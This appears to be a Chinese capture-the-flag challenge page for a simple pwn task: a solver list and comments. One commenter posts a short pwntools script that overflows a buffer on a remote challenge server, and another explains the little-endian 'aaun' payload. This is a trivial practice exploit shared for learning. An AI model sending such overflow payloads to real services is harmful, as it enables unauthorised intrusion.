评分(0)
暂无评分
解题动态

ysmilec 攻破了该题 4天前

854396873 攻破了该题 7天前

花落时相遇 攻破了该题 9天前

an 攻破了该题 18天前

Lolipop 攻破了该题 23天前

1505701406 攻破了该题 27天前

sigmas 攻破了该题 1月前

king123 攻破了该题 1月前

FutureEnter 攻破了该题 1月前

梦游的小狐狸 攻破了该题 1月前

13536169969 攻破了该题 1月前

shuanghu 攻破了该题 1月前

2115032105 攻破了该题 3月前

TOMCAT336699 攻破了该题 3月前

sumql 攻破了该题 4月前

.⎛⎝•̀ω•́⎠⎞. 攻破了该题 4月前

1850211783 攻破了该题 5月前

hanzj 攻破了该题 5月前

t1tl3d 攻破了该题 5月前

评论
怪我喽 1年前
举报
from pwn import* io = remote('82.157.146.43',15682) payload = b'A'*4+p64(1853186401) io.sendline(payload) io.interactive()
黑客小贺 1年前
举报
启动场景,然后放进Linux虚拟机里输入kkkkaaun
nil126 7月前
举报
@whoami12138 1853186401转换为16进制再转换为ascii就是nuaa,再考虑到小端序的存储方式将nuaa进行反转就是aaun,最后加上前面4个补位的字符就可以了。xxxxaaun
whoami12138 11月前
举报
大佬,原理是啥